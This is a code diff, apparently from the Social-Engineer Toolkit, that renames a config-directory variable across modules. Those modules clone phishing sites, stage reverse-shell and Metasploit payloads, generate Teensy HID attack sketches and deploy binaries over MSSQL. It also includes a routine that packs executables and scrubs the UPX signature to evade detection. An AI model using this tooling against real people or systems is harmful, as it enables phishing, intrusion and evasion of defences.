if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(setdir + "/web_clone/index.html.3", shutil.copyfile(userconfigpath + "web_clone/index.html.3",
setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html")
if os.path.isfile(setdir + "/web_clone/index.html.3"): if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
os.remove(setdir + "/web_clone/index.html.3") os.remove(userconfigpath + "web_clone/index.html.3")
if os.path.isfile(setdir + "/web_clone/msf.exe"): if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(setdir + "/web_clone/msf.exe") os.remove(userconfigpath + "web_clone/msf.exe")
shutil.copyfile(setdir + "/web_clone/x", shutil.copyfile(userconfigpath + "web_clone/x",
setdir + "/web_clone/msf.exe") userconfigpath + "web_clone/msf.exe")
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/msf.exe", setdir + "/msf.exe") userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
os.remove(setdir + "/msf.exe") os.remove(userconfigpath + "msf.exe")
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/msf.exe", setdir + "/msf.exe") userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
# catch errors, will convert to log later # catch errors, will convert to log later
except Exception as error: except Exception as error:
@ -317,22 +317,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
# if we are using the HTTP reverse shell then lets use this # if we are using the HTTP reverse shell then lets use this
if payload_selection == "SETSHELL_HTTP": if payload_selection == "SETSHELL_HTTP":
try: try:
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(setdir + "/web_clone/index.html.3", shutil.copyfile(userconfigpath + "web_clone/index.html.3",
setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html")
if os.path.isfile(setdir + "/web_clone/index.html.3"): if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
os.remove(setdir + "/web_clone/index.html.3") os.remove(userconfigpath + "web_clone/index.html.3")
if os.path.isfile(setdir + "/web_clone/msf.exe"): if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(setdir + "/web_clone/msf.exe") os.remove(userconfigpath + "web_clone/msf.exe")
shutil.copyfile( shutil.copyfile(
"src/payloads/set_payloads/http_shell.binary", setdir + "/web_clone/msf.exe") "src/payloads/set_payloads/http_shell.binary", userconfigpath + "web_clone/msf.exe")
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/msf.exe", setdir + "/msf.exe") userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
os.remove(setdir + "/msf.exe") os.remove(userconfigpath + "msf.exe")
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/msf.exe", setdir + "/msf.exe") userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
# catch errors, will convert to log later # catch errors, will convert to log later
except Exception as error: except Exception as error:

84
src/core/set.py
View file

@ -205,7 +205,7 @@ try:
try: try:
# write our attack vector to file to be called later # write our attack vector to file to be called later
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
# webjacking and web templates are not allowed # webjacking and web templates are not allowed
if attack_vector == "5" and choice3 == "1": if attack_vector == "5" and choice3 == "1":
@ -329,7 +329,7 @@ try:
["2"], "IP address to SET web server (this could be your external IP or hostname)")) ["2"], "IP address to SET web server (this could be your external IP or hostname)"))
filewrite2 = open( filewrite2 = open(
setdir + "/interface", "w") userconfigpath + "interface", "w")
filewrite2.write( filewrite2.write(
ipquestion) ipquestion)
filewrite2.close() filewrite2.close()
@ -407,8 +407,8 @@ try:
sys.path.append(definepath + "/src/html/") sys.path.append(definepath + "/src/html/")
# clean up stale file # clean up stale file
if os.path.isfile(setdir + "/cloner.failed"): if os.path.isfile(userconfigpath + "cloner.failed"):
os.remove(setdir + "/cloner.failed") os.remove(userconfigpath + "cloner.failed")
site_cloned = True site_cloned = True
@ -429,7 +429,7 @@ try:
except: except:
import src.core.payloadgen.create_payloads import src.core.payloadgen.create_payloads
if os.path.isfile(setdir + "/cloner.failed"): if os.path.isfile(userconfigpath + "cloner.failed"):
site_cloned = False site_cloned = False
if site_cloned == True: if site_cloned == True:
@ -506,9 +506,9 @@ try:
definepath = os.getcwd() definepath = os.getcwd()
sys.path.append( sys.path.append(
definepath + "/src/webattack/web_clone/") definepath + "/src/webattack/web_clone/")
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
os.remove(setdir + "/site.template") os.remove(userconfigpath + "site.template")
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM") filewrite.write("TEMPLATE=CUSTOM")
print_info("SET supports both HTTP and HTTPS") print_info("SET supports both HTTP and HTTPS")
# specify the site to clone # specify the site to clone
@ -574,7 +574,7 @@ try:
except: except:
import src.webattack.web_clone.cloner import src.webattack.web_clone.cloner
if os.path.isfile(setdir + "/cloner.failed"): if os.path.isfile(userconfigpath + "cloner.failed"):
site_cloned = False site_cloned = False
if site_cloned == True: if site_cloned == True:
@ -652,13 +652,13 @@ try:
sys.path.append( sys.path.append(
definepath + "/src/webattack/web_clone/") definepath + "/src/webattack/web_clone/")
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
os.remove(setdir + "/site.template") os.remove(userconfigpath + "site.template")
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=SELF") filewrite.write("TEMPLATE=SELF")
# specify the site to clone # specify the site to clone
if not os.path.isdir(setdir + "/web_clone"): if not os.path.isdir(userconfigpath + "web_clone"):
os.makedirs(setdir + "/web_clone") os.makedirs(userconfigpath + "web_clone")
print_warning( print_warning(
"Example: /home/website/ (make sure you end with /)") "Example: /home/website/ (make sure you end with /)")
print_warning( print_warning(
@ -671,11 +671,11 @@ try:
if not os.path.isfile(URL + "index.html"): if not os.path.isfile(URL + "index.html"):
if os.path.isfile(URL): if os.path.isfile(URL):
shutil.copyfile( shutil.copyfile(
"%s" % (URL), setdir + "/web_clone/index.html") "%s" % (URL), userconfigpath + "web_clone/index.html")
if not os.path.isfile(URL): if not os.path.isfile(URL):
if URL.endswith("index.html"): if URL.endswith("index.html"):
shutil.copyfile( shutil.copyfile(
URL, "%s/web_clone/index.html" % (setdir)) URL, "%s/web_clone/index.html" % (userconfigpath))
else: else:
print_error("ERROR:index.html not found!!") print_error("ERROR:index.html not found!!")
print_error( print_error(
@ -690,11 +690,11 @@ try:
choice = raw_input( choice = raw_input(
"\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ") "\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ")
if choice == "1" or choice == "": if choice == "1" or choice == "":
if os.path.isfile("%s/web_clone/index.html" % (setdir)): if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
os.remove( os.remove(
"%s/web_clone/index.html" % (setdir)) "%s/web_clone/index.html" % (userconfigpath))
shutil.copyfile( shutil.copyfile(
URL + "index.html", "%s/web_clone/" % (setdir)) URL + "index.html", "%s/web_clone/" % (userconfigpath))
if choice == "2": if choice == "2":
if os.path.isdir(URL + "src/webattack"): if os.path.isdir(URL + "src/webattack"):
print_error( print_error(
@ -705,7 +705,7 @@ try:
print_error( print_error(
"You tried the same thing. Exiting now.") "You tried the same thing. Exiting now.")
sys.exit() sys.exit()
copyfolder(URL, "%s/web_clone/" % setdir) copyfolder(URL, "%s/web_clone/" % userconfigpath)
filewrite.write("\nURL=%s" % (URL)) filewrite.write("\nURL=%s" % (URL))
filewrite.close() filewrite.close()
@ -782,7 +782,7 @@ try:
if not match: if not match:
if not match1: if not match1:
URL = ("http://" + URL) URL = ("http://" + URL)
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("\nURL=%s" % (URL)) filewrite.write("\nURL=%s" % (URL))
filewrite.close() filewrite.close()
@ -807,7 +807,7 @@ try:
if not match: if not match:
if not match1: if not match1:
URL = ("http://" + URL) URL = ("http://" + URL)
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("\nURL=%s" % (URL)) filewrite.write("\nURL=%s" % (URL))
filewrite.close() filewrite.close()
# start tabnabbing here # start tabnabbing here
@ -879,13 +879,13 @@ try:
setprompt(["3"], "IP address for the reverse connection (payload)")) setprompt(["3"], "IP address for the reverse connection (payload)"))
update_options("IPADDR=" + ipaddr) update_options("IPADDR=" + ipaddr)
filewrite1 = open(setdir + "/payloadgen", "w") filewrite1 = open(userconfigpath + "payloadgen", "w")
filewrite1.write("payloadgen=solo") filewrite1.write("payloadgen=solo")
filewrite1.close() filewrite1.close()
# if choice is file-format # if choice is file-format
if infectious_menu_choice == "1": if infectious_menu_choice == "1":
filewrite = open(setdir + "/fileformat.file", "w") filewrite = open(userconfigpath + "fileformat.file", "w")
filewrite.write("fileformat=on") filewrite.write("fileformat=on")
filewrite.close() filewrite.close()
sys.path.append(definepath + "/src/core/msf_attacks/") sys.path.append(definepath + "/src/core/msf_attacks/")
@ -923,8 +923,8 @@ try:
# try: import src.core.payloadgen.solo # try: import src.core.payloadgen.solo
# except: module_reload(src.core.payloadgen.solo) # except: module_reload(src.core.payloadgen.solo)
# if the set payload is there # if the set payload is there
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
shutil.copyfile(setdir + "/msf.exe", "payload.exe") shutil.copyfile(userconfigpath + "msf.exe", "payload.exe")
return_continue() return_continue()
# Main Menu choice 5: Mass Mailer Attack # Main Menu choice 5: Mass Mailer Attack
@ -953,7 +953,7 @@ try:
if teensy_menu_choice != "99": if teensy_menu_choice != "99":
# set our teensy info file in program junk # set our teensy info file in program junk
filewrite = open(setdir + "/teensy", "w") filewrite = open(userconfigpath + "teensy", "w")
filewrite.write(teensy_menu_choice + "\n") filewrite.write(teensy_menu_choice + "\n")
if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14": if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14":
yes_or_no = yesno_prompt( yes_or_no = yesno_prompt(
@ -972,10 +972,10 @@ try:
if yes_or_no == "NO": if yes_or_no == "NO":
filewrite.close() filewrite.close()
# need these default files for web server load # need these default files for web server load
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM") filewrite.write("TEMPLATE=CUSTOM")
filewrite.close() filewrite.close()
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("hid") filewrite.write("hid")
filewrite.close() filewrite.close()
# if we are doing binary2teensy # if we are doing binary2teensy
@ -998,10 +998,10 @@ try:
if teensy_menu_choice == "9": if teensy_menu_choice == "9":
print_status( print_status(
"Generating the SD2Teensy OSX ino file for you...") "Generating the SD2Teensy OSX ino file for you...")
if not os.path.isdir(setdir + "/reports/osx_sd2teensy"): if not os.path.isdir(userconfigpath + "reports/osx_sd2teensy"):
os.makedirs(setdir + "/reports/osx_sd2teensy") os.makedirs(userconfigpath + "reports/osx_sd2teensy")
shutil.copyfile("src/teensy/osx_sd2teensy.ino", shutil.copyfile("src/teensy/osx_sd2teensy.ino",
"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (setdir)) "%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath))
print_status( print_status(
"File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino") "File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino")
return_continue() return_continue()
@ -1010,12 +1010,12 @@ try:
if teensy_menu_choice == "10": if teensy_menu_choice == "10":
print_status( print_status(
"Generating the Arduino sniffer and libraries ino..") "Generating the Arduino sniffer and libraries ino..")
if not os.path.isdir(setdir + "/reports/arduino_sniffer"): if not os.path.isdir(userconfigpath + "reports/arduino_sniffer"):
os.makedirs(setdir + "/reports/arduino_sniffer") os.makedirs(userconfigpath + "reports/arduino_sniffer")
shutil.copyfile("src/teensy/x10/x10_sniffer.ino", shutil.copyfile("src/teensy/x10/x10_sniffer.ino",
setdir + "/reports/arduino_sniffer/x10_sniffer.ino") userconfigpath + "reports/arduino_sniffer/x10_sniffer.ino")
shutil.copyfile("src/teensy/x10/libraries.zip", shutil.copyfile("src/teensy/x10/libraries.zip",
setdir + "/reports/arduino_sniffer/libraries.zip") userconfigpath + "reports/arduino_sniffer/libraries.zip")
print_status( print_status(
"Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer") "Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer")
return_continue() return_continue()
@ -1024,12 +1024,12 @@ try:
if teensy_menu_choice == "11": if teensy_menu_choice == "11":
print_status( print_status(
"Generating the Arduino jammer ino and libraries...") "Generating the Arduino jammer ino and libraries...")
if not os.path.isdir(setdir + "/reports/arduino_jammer"): if not os.path.isdir(userconfigpath + "reports/arduino_jammer"):
os.makedirs(setdir + "/reports/arduino_jammer") os.makedirs(userconfigpath + "reports/arduino_jammer")
shutil.copyfile("src/teensy/x10/x10_blackout.ino", shutil.copyfile("src/teensy/x10/x10_blackout.ino",
setdir + "/reports/arduino_jammer/x10_blackout.ino") userconfigpath + "reports/arduino_jammer/x10_blackout.ino")
shutil.copyfile("src/teensy/x10/libraries.zip", shutil.copyfile("src/teensy/x10/libraries.zip",
setdir + "/reports/arduino_jammer/libraries.zip") userconfigpath + "reports/arduino_jammer/libraries.zip")
print_status( print_status(
"Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer") "Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer")
return_continue() return_continue()
@ -1164,8 +1164,8 @@ and send the QRCode via a mailer.
"Enter the URL you want the QRCode to go to (99 to exit): ") "Enter the URL you want the QRCode to go to (99 to exit): ")
if url != "99": if url != "99":
# if the reports directory does not exist then create it # if the reports directory does not exist then create it
if not os.path.isdir("%s/reports" % (setdir)): if not os.path.isdir("%s/reports" % (userconfigpath)):
os.makedirs("%s/reports" % (setdir)) os.makedirs("%s/reports" % (userconfigpath))
gen_qrcode(url) gen_qrcode(url)
return_continue() return_continue()

82
src/core/setcore.py
View file

@ -332,7 +332,7 @@ def meta_path():
# pull from config first # pull from config first
msf_path = check_config("METASPLOIT_PATH=") msf_path = check_config("METASPLOIT_PATH=")
if not str(msf_path.endswith("/")): if not msf_path.endswith("/"):
msf_path = msf_path + "/" msf_path = msf_path + "/"
if os.path.isfile(msf_path + "msfconsole"): if os.path.isfile(msf_path + "msfconsole"):
trigger = 1 trigger = 1
@ -463,11 +463,11 @@ def cleanup_routine():
try: try:
# restore original Java Applet # restore original Java Applet
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath()), setdir + "/Signed_Update.jar") (definepath()), userconfigpath + "Signed_Update.jar")
if os.path.isfile("newcert.pem"): if os.path.isfile("newcert.pem"):
os.remove("newcert.pem") os.remove("newcert.pem")
if os.path.isfile(setdir + "/interfaces"): if os.path.isfile(userconfigpath + "interfaces"):
os.remove(setdir + "/interfaces") os.remove(userconfigpath + "interfaces")
if os.path.isfile("src/html/1msf.raw"): if os.path.isfile("src/html/1msf.raw"):
os.remove("src/html/1msf.raw") os.remove("src/html/1msf.raw")
if os.path.isfile("src/html/2msf.raw"): if os.path.isfile("src/html/2msf.raw"):
@ -476,10 +476,10 @@ def cleanup_routine():
os.remove("msf.exe") os.remove("msf.exe")
if os.path.isfile("src/html/index.html"): if os.path.isfile("src/html/index.html"):
os.remove("src/html/index.html") os.remove("src/html/index.html")
if os.path.isfile(setdir + "/Signed_Update.jar"): if os.path.isfile(userconfigpath + "Signed_Update.jar"):
os.remove(setdir + "/Signed_Update.jar") os.remove(userconfigpath + "Signed_Update.jar")
if os.path.isfile(setdir + "/version.lock"): if os.path.isfile(userconfigpath + "version.lock"):
os.remove(setdir + "/version.lock") os.remove(userconfigpath + "version.lock")
except: except:
pass pass
@ -559,19 +559,19 @@ def generate_random_string(low, high):
def site_cloner(website, exportpath, *args): def site_cloner(website, exportpath, *args):
grab_ipaddress() grab_ipaddress()
ipaddr = grab_ipaddress() ipaddr = grab_ipaddress()
filewrite = open(setdir + "/interface", "w") filewrite = open(userconfigpath + "interface", "w")
filewrite.write(ipaddr) filewrite.write(ipaddr)
filewrite.close() filewrite.close()
filewrite = open(setdir + "/ipaddr", "w") filewrite = open(userconfigpath + "ipaddr", "w")
filewrite.write(ipaddr) filewrite.write(ipaddr)
filewrite.close() filewrite.close()
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("URL=" + website) filewrite.write("URL=" + website)
filewrite.close() filewrite.close()
# if we specify a second argument this means we want to use java applet # if we specify a second argument this means we want to use java applet
if args[0] == "java": if args[0] == "java":
# needed to define attack vector # needed to define attack vector
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("java") filewrite.write("java")
filewrite.close() filewrite.close()
sys.path.append("src/webattack/web_clone") sys.path.append("src/webattack/web_clone")
@ -586,7 +586,7 @@ def site_cloner(website, exportpath, *args):
# copy the file to a new folder # copy the file to a new folder
print_status("Site has been successfully cloned and is: " + exportpath) print_status("Site has been successfully cloned and is: " + exportpath)
subprocess.Popen("mkdir '%s';cp %s/web_clone/* '%s'" % (exportpath, setdir, subprocess.Popen("mkdir '%s';cp %s/web_clone/* '%s'" % (exportpath, userconfigpath,
exportpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() exportpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
@ -666,7 +666,7 @@ def java_applet_attack(website, port, directory):
if check_options != 0: if check_options != 0:
# move the file to the specified directory and filename # move the file to the specified directory and filename
subprocess.Popen("cp %s/msf.exe %s/%s" % (setdir, directory, filename), subprocess.Popen("cp %s/msf.exe %s/%s" % (userconfigpath, directory, filename),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
applet_name = check_options("APPLET_NAME=") applet_name = check_options("APPLET_NAME=")
@ -675,7 +675,7 @@ def java_applet_attack(website, port, directory):
# lastly we need to copy over the signed applet # lastly we need to copy over the signed applet
subprocess.Popen( subprocess.Popen(
"cp %s/Signed_Update.jar %s/%s" % (setdir, directory, applet_name), "cp %s/Signed_Update.jar %s/%s" % (userconfigpath, directory, applet_name),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# start the web server by running it in the background # start the web server by running it in the background
@ -700,41 +700,41 @@ def teensy_pde_generator(attack_method):
if attack_method == "beef": if attack_method == "beef":
# specify the filename # specify the filename
filename = open("src/teensy/beef.ino", "r") filename = open("src/teensy/beef.ino", "r")
filewrite = open(setdir + "/reports/beef.ino", "w") filewrite = open(userconfigpath + "reports/beef.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Beef Attack Vector under %s/reports/beef.ino" % (setdir)) "Successfully generated Teensy HID Beef Attack Vector under %s/reports/beef.ino" % (userconfigpath))
# if we are doing the attack vector teensy beef # if we are doing the attack vector teensy beef
if attack_method == "powershell_down": if attack_method == "powershell_down":
# specify the filename # specify the filename
filename = open("src/teensy/powershell_down.ino", "r") filename = open("src/teensy/powershell_down.ino", "r")
filewrite = open(setdir + "/reports/powershell_down.ino", "w") filewrite = open(userconfigpath + "reports/powershell_down.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/powershell_down.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/powershell_down.ino" % (userconfigpath))
# if we are doing the attack vector teensy # if we are doing the attack vector teensy
if attack_method == "powershell_reverse": if attack_method == "powershell_reverse":
# specify the filename # specify the filename
filename = open("src/teensy/powershell_reverse.ino", "r") filename = open("src/teensy/powershell_reverse.ino", "r")
filewrite = open(setdir + "/reports/powershell_reverse.ino", "w") filewrite = open(userconfigpath + "reports/powershell_reverse.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/powershell_reverse.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/powershell_reverse.ino" % (userconfigpath))
# if we are doing the attack vector teensy beef # if we are doing the attack vector teensy beef
if attack_method == "java_applet": if attack_method == "java_applet":
# specify the filename # specify the filename
filename = open("src/teensy/java_applet.ino", "r") filename = open("src/teensy/java_applet.ino", "r")
filewrite = open(setdir + "/reports/java_applet.ino", "w") filewrite = open(userconfigpath + "reports/java_applet.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/java_applet.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/java_applet.ino" % (userconfigpath))
# if we are doing the attack vector teensy # if we are doing the attack vector teensy
if attack_method == "wscript": if attack_method == "wscript":
# specify the filename # specify the filename
filename = open("src/teensy/wscript.ino", "r") filename = open("src/teensy/wscript.ino", "r")
filewrite = open(setdir + "/reports/wscript.ino", "w") filewrite = open(userconfigpath + "reports/wscript.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/wscript.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/wscript.ino" % (userconfigpath))
# All the options share this code except binary2teensy # All the options share this code except binary2teensy
if attack_method != "binary2teensy": if attack_method != "binary2teensy":
@ -750,7 +750,7 @@ def teensy_pde_generator(attack_method):
# specify the filename # specify the filename
import src.teensy.binary2teensy import src.teensy.binary2teensy
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/binary2teensy.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/binary2teensy.ino" % (userconfigpath))
print_status(teensy_string) print_status(teensy_string)
# #
@ -811,10 +811,10 @@ def upx(path_to_file):
"Packing the executable and obfuscating PE file randomly, one moment.") "Packing the executable and obfuscating PE file randomly, one moment.")
# packing executable # packing executable
subprocess.Popen( subprocess.Popen(
"%s -9 -q -o %s/temp.binary %s" % (upx_path, setdir, path_to_file), "%s -9 -q -o %s/temp.binary %s" % (upx_path, userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# move it over the old file # move it over the old file
subprocess.Popen("mv %s/temp.binary %s" % (setdir, path_to_file), subprocess.Popen("mv %s/temp.binary %s" % (userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# random string # random string
@ -822,7 +822,7 @@ def upx(path_to_file):
# 4 upx replace - we replace 4 upx open the file # 4 upx replace - we replace 4 upx open the file
fileopen = open(path_to_file, "rb") fileopen = open(path_to_file, "rb")
filewrite = open(setdir + "/temp.binary", "wb") filewrite = open(userconfigpath + "temp.binary", "wb")
# read the file open for data # read the file open for data
data = fileopen.read() data = fileopen.read()
@ -830,7 +830,7 @@ def upx(path_to_file):
filewrite.write(data.replace("UPX", random_string, 4)) filewrite.write(data.replace("UPX", random_string, 4))
filewrite.close() filewrite.close()
# copy the file over # copy the file over
subprocess.Popen("mv %s/temp.binary %s" % (setdir, path_to_file), subprocess.Popen("mv %s/temp.binary %s" % (userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
time.sleep(3) time.sleep(3)
@ -873,13 +873,13 @@ def show_banner(define_version, graphic):
version = "" version = ""
def pull_version(): def pull_version():
if not os.path.isfile(setdir + "/version.lock"): if not os.path.isfile(userconfigpath + "version.lock"):
try: try:
url = ( url = (
'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version') 'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version')
version = urlopen(url).read().rstrip().decode('utf-8') version = urlopen(url).read().rstrip().decode('utf-8')
filewrite = open(setdir + "/version.lock", "w") filewrite = open(userconfigpath + "version.lock", "w")
filewrite.write(version) filewrite.write(version)
filewrite.close() filewrite.close()
@ -887,7 +887,7 @@ def show_banner(define_version, graphic):
version = "keyboard interrupt" version = "keyboard interrupt"
else: else:
version = open(setdir + "/version.lock", "r").read() version = open(userconfigpath + "version.lock", "r").read()
if cv != version: if cv != version:
if version != "": if version != "":
@ -1414,8 +1414,8 @@ def copyfolder(sourcePath, destPath):
def check_options(option): def check_options(option):
# open the directory # open the directory
trigger = 0 trigger = 0
if os.path.isfile(setdir + "/set.options"): if os.path.isfile(userconfigpath + "set.options"):
fileopen = open(setdir + "/set.options", "r").readlines() fileopen = open(userconfigpath + "set.options", "r").readlines()
for line in fileopen: for line in fileopen:
match = re.search(option, line) match = re.search(option, line)
if match: if match:
@ -1433,13 +1433,13 @@ def check_options(option):
def update_options(option): def update_options(option):
# if the file isn't there write a blank file # if the file isn't there write a blank file
if not os.path.isfile(setdir + "/set.options"): if not os.path.isfile(userconfigpath + "set.options"):
filewrite = open(setdir + "/set.options", "w") filewrite = open(userconfigpath + "set.options", "w")
filewrite.write("") filewrite.write("")
filewrite.close() filewrite.close()
# remove old options # remove old options
fileopen = open(setdir + "/set.options", "r") fileopen = open(userconfigpath + "set.options", "r")
old_options = "" old_options = ""
for line in fileopen: for line in fileopen:
match = re.search(option, line) match = re.search(option, line)
@ -1447,7 +1447,7 @@ def update_options(option):
line = "" line = ""
old_options = old_options + line old_options = old_options + line
# append to file # append to file
filewrite = open(setdir + "/set.options", "w") filewrite = open(userconfigpath + "set.options", "w")
filewrite.write(old_options + "\n" + option + "\n") filewrite.write(old_options + "\n" + option + "\n")
filewrite.close() filewrite.close()
@ -1771,7 +1771,7 @@ def setdir():
return "src/program_junk/" return "src/program_junk/"
# set the main directory for SET # set the main directory for SET
setdir = setdir() userconfigpath = setdir()
# Copyright (c) 2007 Brandon Sterne # Copyright (c) 2007 Brandon Sterne
# Licensed under the MIT license. # Licensed under the MIT license.
@ -2025,7 +2025,7 @@ def input(string):
def fetch_template(): def fetch_template():
fileopen = open(setdir + "/site.template").readlines() fileopen = open(userconfigpath + "site.template").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("URL=", line) match = re.search("URL=", line)

2
src/core/ssl/setssl.py
View file

@ -8,7 +8,7 @@ from src.core.setcore import *
import subprocess import subprocess
import os import os
definepath = os.getcwd() definepath = os.getcwd()
os.chdir(setdir) os.chdir(userconfigpath)
# create the directories for us # create the directories for us
subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait() subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait()
# move into CA directory # move into CA directory

2
src/fasttrack/autopwn.py
View file

@ -45,7 +45,7 @@ def launch():
# try/catch block # try/catch block
try: try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'), child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'),
os.path.join(core.setdir + "autopwn.answer"))) os.path.join(core.userconfigpath, "autopwn.answer")))
child.interact() child.interact()
# handle exceptions and log them # handle exceptions and log them

52
src/fasttrack/mssql.py
View file

@ -178,21 +178,21 @@ def deploy_hex2binary(ipaddr, port, username, password):
# if we are using a SET interactive shell payload then we need to make # if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set # the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")): if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
web_path = os.path.join(core.setdir + "web_clone") web_path = os.path.join(core.userconfigpath, "web_clone")
# then we are using metasploit # then we are using metasploit
else: else:
if operating_system == "posix": if operating_system == "posix":
web_path = core.setdir web_path = core.userconfigpath
# if it isn't there yet # if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"): if not os.path.isfile(core.userconfigpath + "1msf.exe"):
# move it then # move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait() (core.userconfigpath, core.userconfigpath), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait() (core.userconfigpath, core.userconfigpath), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
